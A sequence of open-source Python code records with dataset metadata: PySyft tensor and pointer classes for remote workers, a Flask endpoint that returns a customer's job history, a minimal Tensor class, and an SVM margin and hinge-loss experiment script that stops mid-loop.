def get(self, parent, deregister_ptr=None):
raise TypeError("Cannot call .get() on a tensor you already have.")
class _PlusIsMinusTensor(_SyftTensor):
"""
Example of a custom overloaded _SyftTensor
Role:
Converts all add operations into sub/minus ones.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# The table of command you want to replace
substitution_table = {
'torch.add': 'torch.add'
}
class overload_functions:
"""
Put here the functions you want to overload
Beware of recursion errors.
"""
@staticmethod
def add(x, y):
return x.add(y)
@staticmethod
def get(attr):
attr = attr.split('.')[-1]
return getattr(sy._PlusIsMinusTensor.overload_functions, attr)
# Put here all the methods you want to overload
def add(self, arg):
"""
Overload the add method and execute another function or method with the provided args
"""
_response = self.sub(arg)
return _response
def abs(self):
"""
Overload the abs() method and execute another function
"""
return torch.abs(self)
class _PointerTensor(_SyftTensor):
def __init__(self, child, parent, torch_type, location=None, id_at_location=None, id=None,
owner=None, skip_register=False):
super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner, id=id,
skip_register=skip_register)
if location is None:
raise AttributeError("Pointer must have a location specified")
self.location = self.owner.get_worker(location)
self.id_at_location = id_at_location
self.torch_type = torch_type
self.register_pointer()
# pointers to themselves that get registered should trigger the flat
# if it's not getting registered the pointer is probably about to be
# sent over the wire
if self.location == self.owner and not skip_register:
logging.warning("Do you really want a pointer pointing to itself? (self.location == self.owner)")
def register_pointer(self):
worker = self.owner
location = self.location.id
id_at_location = self.id_at_location
# Add the remote location worker key if needed
if location not in worker._pointers.keys():
worker._pointers[location] = {}
# Add the remote address
worker._pointers[location][id_at_location] = self.id
@classmethod
def handle_call(cls, syft_command, owner):
"""
_PointerTensor has an overloaded handle_call function because it converts
the command to torch tensors and send it over the network
"""
tensor_command = torch_utils.wrap_command(syft_command)
attr = tensor_command['command']
args = tensor_command['args']
kwargs = tensor_command['kwargs']
has_self = tensor_command['has_self']
self_ = tensor_command['self'] if has_self else None
command, locations, owners = torch_utils.compile_command(attr,
args,
kwargs,
has_self=has_self,
self=self_)
location = locations[0]
owner = owners[0]
# Else we send the command
response = owner.send_torch_command(recipient=location, message=command)
torch_utils.assert_has_only_torch_tensorvars(response)
# If the command is an in-place method, we only need to return the same wrapper to the same
# pointer, instead of returning the new wrapper created in response
if has_self and utils.is_in_place_method(attr):
return syft_command['self']
# Perform the un-wrap
response, _ = torch_utils.get_child_command(response)
return response
def __str__(self):
return "[" + type(self).__name__ + " - id:" + str(self.id) + " owner:" + str(
self.owner.id) + " loc:" + str(self.location.id) + " id@loc:" + str(
self.id_at_location) + "]"
def ser(self, private, as_dict=True):
data = {
'owner': self.owner.id,
'id': self.id,
'location': self.location.id,
'id_at_location': self.id_at_location,
'torch_type': self.torch_type
}
if as_dict:
return {'___PointerTensor__': data}
else:
return json.dumps({'___PointerTensor__': data}) + "\n"
@classmethod
def deser(cls, msg_obj, worker, acquire):
# If local, we render the object or syft object
if msg_obj['location'] == worker.id:
syft_obj = worker.get_obj(msg_obj['id_at_location'])
else:
if acquire: # If there is data transmission, data being here Pointer
# We acquire the tensor pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['location'],
id_at_location=msg_obj['id_at_location'],
owner=worker,
id=msg_obj['id'],
skip_register=True)
else:
syft_obj = previous_pointer
else: # We point at the Pointer (same part as every syft tensors)
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def get(self, deregister_ptr=True):
"""
Get back from a remote worker the chain this pointer is pointing at
"""
# Remove this pointer
if deregister_ptr:
if self.torch_type == 'syft.Variable':
self.owner.rm_obj(self.parent.data.child.id)
self.owner.rm_obj(self.id)
# if the pointer happens to be pointing to a local object,
# just return that object (this is an edge case)
if self.location == self.owner:
return self.owner.get_obj(self.id_at_location).child
# get SyftTensor (Local or Pointer) from remote machine
tensorvar = self.owner.request_obj(self.id_at_location, self.location)
torch_utils.assert_has_only_torch_tensorvars(tensorvar)
syft_tensor = tensorvar.child
syft_tensor.id = self.id
if self.torch_type == 'syft.Variable':
tensorvar.data.child.id = self.parent.data.child.id
# Register the result
self.owner.register(syft_tensor)
if syft_tensor.torch_type == 'syft.Variable':
self.owner.register(tensorvar.data.child)
torch_utils.fix_chain_ends(tensorvar)
return tensorvar
class _FixedPrecisionTensor(_SyftTensor):
def __init__(self, child, parent, torch_type, owner=None):
super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner)
class _TorchObject(object):
"""
This tensor is simply a more convenient way to add custom
functions to all Torch tensor types, including Torch Variable.
Note that it is the parent class of the two following classes:
_TorchTensor and a_TorchVariable
"""
__module__ = 'syft'
def set_id(self, new_id):
self.child.set_id(new_id)
return self
def __str__(self):
return self.native___str__()
def __repr__(self):
if torch_utils.is_tensor(self) and hasattr(self, 'child') and not isinstance(self.child, (
sy._LocalTensor, sy._PointerTensor)):
x_ = type(self)()
x_.native_set_(self)
return "[Head of chain]\n" + x_.native___repr__()
if torch_utils.is_variable(self) and hasattr(self, 'child') and not isinstance(self.child, (
sy._LocalTensor, sy._PointerTensor)):
x_ = type(self)(self.data)
x_.native_set_(self)
return "[Head of chain]\n" + x_.native___repr__()
return self.native___repr__()
def create_pointer(self, register=False, location=None, ptr_id=None):
return self.child.create_pointer(parent=self, register=register, location=location,
ptr_id=ptr_id).wrap()
def move(self, worker, new_id=None):
"""
Give the end leaf of the chain to worker,
just like if the last elmt was send its child
to worker
self->alice->obj [worker] => self->alice->worker->obj
"""
raise NotImplementedError('Move is not supported anymore.')
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if new_id is None:
new_id = random.randint(0, 10e10)
if isinstance(self.child, sy._PointerTensor):
pointer = self.child
else:
pointer = None
if pointer is None:
return self.send(worker, new_id)
command, _ = pointer.compile_command('move',
(worker.id, new_id),
{},
True)
response = pointer.owner.send_torch_command(recipient=pointer.location,
message=command)
return self
class _TorchTensor(_TorchObject):
def __str__(self):
if isinstance(self.child, _PointerTensor):
return type(self).__name__ + self.child.__str__() + ""
elif isinstance(self.child, _LocalTensor) and torch_utils.is_tensor_empty(self):
if (hasattr(self.child, 'child')):
return self.child.child.native___str__()
else:
return "Empty Wrapper:\n" + self.native___str__()
else:
if not isinstance(self.child, (sy._LocalTensor, sy._PointerTensor)):
x_ = type(self)()
x_.native_set_(self)
return "[Head of chain]\n" + x_.native___repr__()
return self.native___str__()
def ser(self, private, as_dict=True):
key = '__' + type(self).__name__ + '__'
data = self.tolist() if not private else []
tensor_msg = {
'type': str(self.__class__).split("'")[1],
'torch_type': 'syft.' + type(self).__name__,
'data': data,
'child': self.child.ser(private)
}
if as_dict:
return {key: tensor_msg}
else:
return json.dumps({key: tensor_msg}) + "\n"
@staticmethod
def deser(msg_obj, worker, acquire):
obj_type, msg_obj = torch_utils.extract_type_and_obj(msg_obj)
syft_obj = sy._SyftTensor.deser_routing(msg_obj['child'], worker, acquire)
# If we have retrieved an already existing object (TODO: add checks) then return it
if syft_obj.parent is not None and syft_obj.child is not None:
return syft_obj.parent
tensorvar = torch.guard['syft.' + obj_type](msg_obj['data'])
torch_utils.wrap_command_with(syft_obj, tensorvar)
# TODO: Find a smart way to skip register and not leaking the info to the local worker
# This would imply overload differently the __init__ to provide an owner for the child attr.
worker.hook.local_worker.de_register(tensorvar)
# Ensure that the loop is made, if needed
if isinstance(torch_utils.find_tail_of_chain(tensorvar), sy._LocalTensor):
torch_utils.fix_chain_ends(tensorvar)
return tensorvar
def send(self, worker, ptr_id=None):
"""
Give the root of the chain held by self to worker
self->alice->obj [worker] => self->worker->alice->obj
Args:
worker: the recipient of the transfer
ptr_id: the id of the object when sent:
x.send(bob, 1000)
will result in bob having the tensor x with id 1000
"""
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if ptr_id is None:
ptr_id = random.randint(0, 10e10)
obj_id = self.child.id
# creates a pointer to LocalTensor without a Torch object wrapping it because
# we're going to set self.child to be this pointer.
# we set register=True because we want it to be registered locally
self.owner.send_obj(self, ptr_id, worker)
# clears data which could be cached in the wrapper (which is self)
# which would be confusing for folks
self.native_set_()
# set this wrapper's child to be the newly created PointerTensor
self.child.id = obj_id
syft_pointer = self.child.create_pointer(location=worker, id_at_location=ptr_id, register=True)
torch_utils.wrap_command_with(syft_pointer, self)
self.parent = None
return self
def get(self, deregister_ptr=True, update_ptr_wrapper=True):
"""
Get a remote tensor back to the local worker.
:param deregister_ptr: should we de-register from the remote. Default to True
:param update_ptr_wrapper: If true, by default, change the pointer variable (wrapper)
to instead wrap the SyftTensor object that was returned so that any variable that may
still exist referencing this pointer will simply call local data instead of sending
messages elsewhere, or a closer pointer
:return: self
"""
# returns a Tensor object wrapping a SyftTensor
tensor = self.child.get(deregister_ptr=deregister_ptr)
torch_utils.assert_has_only_torch_tensorvars(tensor)
# this will change the pointer variable (wrapper) to instead wrap the
# SyftTensor object that was returned so that any variable that may
# still exist referencing this pointer will simply call local data instead
# of sending messages elsewhere, or a closer pointer
if update_ptr_wrapper:
syft_tensor = tensor.child
self.child = syft_tensor
# In case we have a final get() (ie returning a FloatTensor), we have e.g.
# x = Float(...)
# x.send(...)
# x2 = x.get()
# We have x2: [no dim]->[_Local]->[Float()]
# Whereas we expect x2: [Float()]
# So we use the .set_() method, to change the storage of [no dim]
if not isinstance(syft_tensor, sy._PointerTensor) \
and tensor is not None \
and tensor.dim() > 0:
self.native_set_(tensor)
torch_utils.fix_chain_ends(self)
torch_utils.assert_is_chain_well_formed(self)
return self
class _TorchVariable(_TorchObject):
def send(self, worker, new_id=None, new_data_id=None, new_grad_id=None, new_grad_data_id=None):
"""
Give the root of the chain held by self to worker
self->alice->obj [worker] => self->worker->alice->obj
Because there are Variable involved, there are actually 4 chains involved,
the variable chain, variable.data, variable.grad, variable.grad.data
"""
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
# Init new remote ids if needed
(new_id, new_data_id, new_grad_id, new_grad_data_id) = utils.map_tuple(None,
(new_id, new_data_id, new_grad_id,new_grad_data_id),
lambda id: id if id is not None else random.randint(0, 10e10))
# Store tensorvar ids
obj_id = self.child.id
obj_data_id = self.data.child.id
obj_grad_id = self.grad.child.id if self.grad is not None else None
obj_grad_data_id = self.grad.data.child.id if self.grad is not None else None
self.owner.send_obj(self,
new_id,
worker,
new_data_id=new_data_id,
new_grad_id=new_grad_id,
new_grad_data_id=new_grad_data_id)
# Clear data which could be cached in the wrapper (which is self)
utils.map_tuple(None, (self, self.data, self.grad, self.grad.data), lambda x: x.native_set_())
# For all the objects, create a pointer and insert it as a direct child
for id, remote_id, wrapper in zip(
[obj_id, obj_data_id, obj_grad_id, obj_grad_data_id],
[new_id, new_data_id, new_grad_id, new_grad_data_id],
[self, self.data, self.grad, self.grad.data]):
wrapper.child.id = id
pointer = wrapper.child.create_pointer(location=worker, id_at_location=remote_id, register=True)
torch_utils.wrap_command_with(pointer, wrapper)
wrapper.parent = None
torch_utils.link_var_chain_to_data_and_grad_chains(self, self.data, self.grad)
return self
def get(self, deregister_ptr=True, update_ptr_wrapper=True):
"""
Get a remote variable back to the local worker.
:param deregister_ptr: should we de-register from the remote. Default to True
:param update_ptr_wrapper: If true, by default, change the pointer variable (wrapper)
to instead wrap the SyftTensor object that was returned so that any variable that may
still exist referencing this pointer will simply call local data instead of sending
messages elsewhere, or a closer pointer
:return: self
"""
# returns a Variable object wrapping a SyftTensor
variable = self.child.get(deregister_ptr=deregister_ptr)
torch_utils.assert_has_only_torch_tensorvars(variable)
# this will change the wrapper variable to instead wrap the
# SyftTensor object that was returned so that any variable that may
# still exist referencing this pointer will simply call local data instead
# of sending messages elsewhere, or a closer pointer
if update_ptr_wrapper:
self.child = variable.child
self.data.child = variable.data.child
if self.grad is not None and variable.grad is not None:
self.grad.child = variable.grad.child
# In case we have a final get() (ie returning a FloatTensor), we have e.g.
# x = Float(...)
# x.send(...)
# x2 = x.get()
# We have x2: [no dim]->[_Local]->[Float()]
# Whereas we expect x2: [Float()]
# So we use the .set_() method, to change the storage of [no dim]
if not isinstance(variable.child, sy._PointerTensor) \
and variable.data is not None \
and variable.data.dim() > 0:
self.native_set_(variable)
if self.grad is not None and variable.grad is not None:
self.grad.data = variable.grad.data
if self.grad is not None:
torch_utils.link_var_chain_to_data_and_grad_chains(self, self.data, self.grad)
else:
torch_utils.link_var_chain_to_data_chain(self, self.data)
torch_utils.fix_chain_ends(self)
torch_utils.assert_is_chain_well_formed(self)
return self
def ser(self, private, as_dict=True):
key = '__' + type(self).__name__ + '__'
tensor_msg = {
'type': str(self.__class__).split("'")[1],
'torch_type': 'syft.' + type(self).__name__,
'data': self.data.ser(private),
'child': self.child.ser(private),
'requires_grad': self.requires_grad
}
if self.grad is not None:
tensor_msg['grad'] = self.grad.ser(private)
elif self.data.dim() > 0:
# Create a .grad just if there is some data in the tensor (to avoid recursion errors)
self.init_grad_()
tensor_msg['grad'] = self.grad.ser(private)
if as_dict:
return {key: tensor_msg}
else:
return json.dumps({key: tensor_msg}) + "\n"
@staticmethod
def deser(msg_obj, worker, acquire):
obj_type, msg_obj = torch_utils.extract_type_and_obj(msg_obj)
var_syft_obj = sy._SyftTensor.deser_routing(msg_obj['child'], worker, acquire)
if var_syft_obj.parent is not None and var_syft_obj.child is not None:
return var_syft_obj.parent
# Deser the var.data
var_data_type, var_data_tensor = torch_utils.extract_type_and_obj(msg_obj['data'])
if torch_utils.is_tensor(var_data_type):
var_data = torch.guard['syft.' + var_data_type].deser(msg_obj['data'], worker, acquire)
worker.hook.local_worker.de_register(var_data)
else:
raise TypeError('Data is not a tensor:', var_data_type)
variable = sy.Variable(var_data, requires_grad=msg_obj['requires_grad'])
# Deser the var.grad
if 'grad' in msg_obj:
var_grad_type, var_grad_tensor = torch_utils.extract_type_and_obj(msg_obj['grad'])
var_grad = torch.guard['syft.' + var_grad_type].deser(msg_obj['grad'], worker, acquire)
worker.hook.local_worker.de_register(var_grad)
variable.assign_grad_(var_grad)
else:
var_grad = None
# TODO: Find a smart way to skip register and not leaking the info to the local worker
# This would imply overload differently the __init__ to provide an owner for the child attr.
worker.hook.local_worker.de_register(variable)
worker.hook.local_worker.de_register(variable.data)
if variable.grad is not None:
worker.hook.local_worker.de_register(variable.grad)
worker.hook.local_worker.de_register(variable.grad.data)
variable.child = var_syft_obj
var_syft_obj.parent = variable
# Re-assign the data, and propagate deeply
if var_grad is None:
torch_utils.link_var_chain_to_data_chain(variable, var_data)
else:
torch_utils.link_var_chain_to_data_and_grad_chains(variable, var_data, var_grad)
return variable
def init_grad_(self):
"""
Initialise grad as an empty tensor
"""
self.grad = sy.Variable(sy.zeros(self.size()).type(type(self.data)))
self.grad.native_set_()
self.grad.child.owner = self.owner
self.grad.data.child.owner = self.owner
def assign_grad_(self, var_grad):
"""
Assign to self.grad any type of variable
"""
# save the var_grad.data
var_grad_data = var_grad.data
# Transform var_grad into an envelope compatible with .grad assignment
if self.size() != var_grad.size():
var_grad.data = sy.zeros(self.data.size())
var_grad.data = var_grad.data.type(type(self.data))
self.grad = var_grad
# put back original var_grad.data
self.grad.data = var_grad_data
| 15,325 | 16,499 | 524 |
cc9dd8cf46ccc1eb841121a757ce978bd638c1e7 | 2,209 | py | Python | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | null | null | null | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | 1 | 2021-09-18T05:56:45.000Z | 2021-09-18T05:56:45.000Z | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | null | null | null | from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
# 특정 고객의 모든 시술 기록을 불러옴
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
| 35.063492 | 124 | 0.67904 | from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
# 특정 고객의 모든 시술 기록을 불러옴
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
def getJobHistory(customerID):
database = PostgresControll()
customerData = database.getCustomerData(customerID=customerID)
if len(customerData) == 0:
from msg.jsonMsg import customerNotFound
return Response(customerNotFound(customerID=customerID), status=404, content_type="application/json; charset=UTF-8")
jobData = database.getJobsFromCustomerID(customerID=customerID)
if jobData is None:
from msg.jsonMsg import databaseIsGone
return Response(databaseIsGone(), status=500, content_type="application/json; charset=UTF-8")
payload = dict()
jobs = list()
for job in jobData:
temp = dict()
jobID = job.get('job_id')
temp['jobID'] = jobID
jobFinished = database.getJobFinishedArray(jobID=jobID)
if jobFinished is None:
from msg.jsonMsg import databaseIsGone
return Response(databaseIsGone(), status=500, content_type="application/json; charset=UTF-8")
# 반환 타입이 ReadDictRow라서 dict로 변환하는 작업
array = dict()
for finished in jobFinished:
array[finished.get('type_id')] = finished.get('job_name')
temp['jobFinished'] = array
temp['visitDate'] = job.get('visit_date').strftime('%Y-%m-%d')
if job.get('job_price') is None:
temp['jobPrice'] = 0
else:
temp['jobPrice'] = int(job.get('job_price'))
temp['jobDescription'] = job.get('job_description')
jobs.append(temp)
temp = dict()
temp['customerID'] = customerID
temp['customerName'] = customerData.get('customer_name')
temp['phoneNumber'] = customerData.get('phone_number')
payload['customerData'] = temp
payload['jobData'] = jobs
return Response(json.dumps(payload), status=200, content_type="application/json; charset=UTF-8")
| 1,851 | 0 | 22 |
29300bf9bee9f68f012ef9344b1eeab4fad8bcc6 | 1,759 | py | Python | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | 13 | 2018-04-20T09:52:24.000Z | 2021-02-16T22:46:25.000Z | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | null | null | null | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | 5 | 2019-02-18T12:51:29.000Z | 2022-03-06T15:08:53.000Z | import numpy as np
class LongTensor:
"""
LongTensor is a type of Tensor to keep integers
"""
def __init__(self, value, name='LongTensor', trainable=False):
"""
:param value: long value
:param name:
:param trainable:
"""
self.value = np.array(value, dtype=np.int32)
self.name = name
class Tensor:
"""
Tensor is the basic structure in the computation graph
It holds value for forward computation and grad for backward propagation
"""
def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
"""
:param value: numpy val
:param name: name for the Tensor
:param trainable: whether the Tensor can be trained or not
"""
# value for forward computation
if isinstance(value, list):
self.value = np.array(value, dtype=dtype)
else:
self.value = value
# value for backward computation
if grad is not None:
self.grad = grad
else:
self.grad = np.zeros(self.value.shape, dtype=np.float32)
# name for the Tensor (which will used in parameter for registration)
self.name = name
# whether the Tensor can be updated
self.trainable = trainable
| 25.128571 | 112 | 0.590677 | import numpy as np
class LongTensor:
"""
LongTensor is a type of Tensor to keep integers
"""
def __init__(self, value, name='LongTensor', trainable=False):
"""
:param value: long value
:param name:
:param trainable:
"""
self.value = np.array(value, dtype=np.int32)
self.name = name
def clear_grad(self):
return
def reshape(self, array):
return
class Tensor:
"""
Tensor is the basic structure in the computation graph
It holds value for forward computation and grad for backward propagation
"""
def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
"""
:param value: numpy val
:param name: name for the Tensor
:param trainable: whether the Tensor can be trained or not
"""
# value for forward computation
if isinstance(value, list):
self.value = np.array(value, dtype=dtype)
else:
self.value = value
# value for backward computation
if grad is not None:
self.grad = grad
else:
self.grad = np.zeros(self.value.shape, dtype=np.float32)
# name for the Tensor (which will used in parameter for registration)
self.name = name
# whether the Tensor can be updated
self.trainable = trainable
def __str__(self):
return "Tensor {name: "+self.name+"}\n- value : "+str(self.value)+"\n- gradient : "+str(self.grad)+""
def __repr__(self):
return self.__str__()
def clear_grad(self):
self.grad.fill(0.0)
def reshape(self, array):
self.value.reshape(array)
self.grad.reshape(array)
| 271 | 0 | 162 |
ecbd1a9534534abe593e2f4947ba9fa64382adf4 | 12,996 | py | Python | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
"""
Compute the unit vector.
Parameters
----------
vector : numpy array
The input vector.
Returns
-------
TYPE : numpy array
The unit vector of the input.
"""
return vector / np.linalg.norm(vector)
def angle_between(v1, v2):
"""
Calculate the angle between two vectors.
Parameters
----------
v1 : numpy array
vector 1.
v2 : numpu array
vector 2.
Returns
-------
TYPE :
The angle between two vectors in raidan.
"""
v1_u = unit_vector(v1)
v2_u = unit_vector(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def projection_on_line(c_center_1, c_center_2, original_data):
"""
Calculate the projection of one data points on the line going through \
bothcluster centers.
Parameters
----------
c_center_1 : numpy 1 by 2 array
first center coordinates.
c_center_2 : numpy 1 by 2 array
scond center coordinates.
original_data : numpy n by 2 array
data points.
Returns
-------
projection : numpy array
the coordinates of the points projected on to the line going through\
the line which connects the two centers.
"""
vector_data = original_data - c_center_1
projection_line = c_center_1 - c_center_2
projection = c_center_1 + np.dot(vector_data, projection_line) /\
np.dot(projection_line, projection_line) * projection_line
return projection
def calculate_center(original_data):
"""
Calculate the center of data points for the label.
Parameters
----------
original_data : numpy array
The data points.
Returns
-------
center_co : numpy array
The coordinates of the center point.
"""
avr_vec = np.sum(original_data, axis=0)
center_co = avr_vec/original_data.shape[0]
return center_co
def calculate_pvar(pdata):
"""
Calculate the variance of the data projected on to the line.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = []
for i in range(pdata.shape[0]):
sign_v = np.dot(unit_vector(temp_disvec[1, :]),
unit_vector(temp_disvec[i, :]))
temp_valu = np.sign(sign_v) * np.linalg.norm(temp_disvec[i, :])
temp_vec.append(temp_valu)
# temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_vec = np.array(temp_vec)
data_var = np.var(temp_vec)
return data_var
def calculate_dvar(pdata):
"""
Calculate the variance of the data based on the distance from central\
point.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_pvec = np.power(temp_vec, 2)
temp_sum = np.sum(temp_pvec)
data_var = temp_sum / pdata.shape[0]
return data_var
def rotate_data(X_data, y):
"""
Do the rotation to make variance calculation easier.
Parameters
----------
X_data : numpy array
The data points that we want to rotata.
y : numpy array
Labels for X_data.
Returns
-------
X_rotated : numpy array
Rotated numpy array.
"""
X_datap = X_data[y == 1]
X_datan = X_data[y == -1]
center_p = calculate_center(X_datap)
center_n = calculate_center(X_datan)
slope = (center_p[1] - center_n[1])/(center_p[0] - center_n[0])
# slope = (X_data[0, 1] - X_data[1, 1])/(X_data[0, 0] - X_data[1, 0])
angle = (math.atan(slope))
theta = -angle
c, s = np.cos(theta), np.sin(theta)
rotation_mat = np.array(((c, -s), (s, c)))
X_rotated = []
for i in range(X_data.shape[0]):
X_rot = rotation_mat.dot(X_data[i])
X_rotated.append(X_rot)
X_rotated = np.array(X_rotated)
return X_rotated
# %% Generating the data
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
centers=centers,
cluster_std=clusters_std,
random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calulate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which go through the cetners
X_pro = []
for i in range(X_s.shape[0]):
projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
X_s[i])
X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
(X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and centeral points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going throught two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approch
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
random_state=1)
i = i
Cs = np.logspace(-1, 2, 1000).tolist()
Cs = np.array(Cs)
clf = svm.SVC(kernel='linear', C=Cs)
C = []
Margin = []
train_errors = []
test_errors = []
number_of_misclassified_train_points = []
number_of_misclassified_test_points = []
Train_hinge_loss = []
cost_training = []
Test_hinge_loss = []
cost_testing = []
for C in Cs:
clf.set_params(C=C)
clf.fit(X_train, y_train)
i = i
w = clf.coef_[0]
y_train_predict = clf.predict(X_train)
train_error = metrics.mean_squared_error(y_train, y_train_predict)
train_errors.append(train_error)
misclassified_train = np.where(y_train != y_train_predict)
number_of_misclassified_train_points.append(misclassified_train)
pred_decision_train = clf.decision_function(X_train)
hinge_loss_train = hinge_loss(y_train, pred_decision_train)
Train_hinge_loss.append(hinge_loss_train)
pred_decision_test = clf.decision_function(X_test)
hinge_loss_test = hinge_loss(y_test, pred_decision_test)
Test_hinge_loss.append(hinge_loss_test)
cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
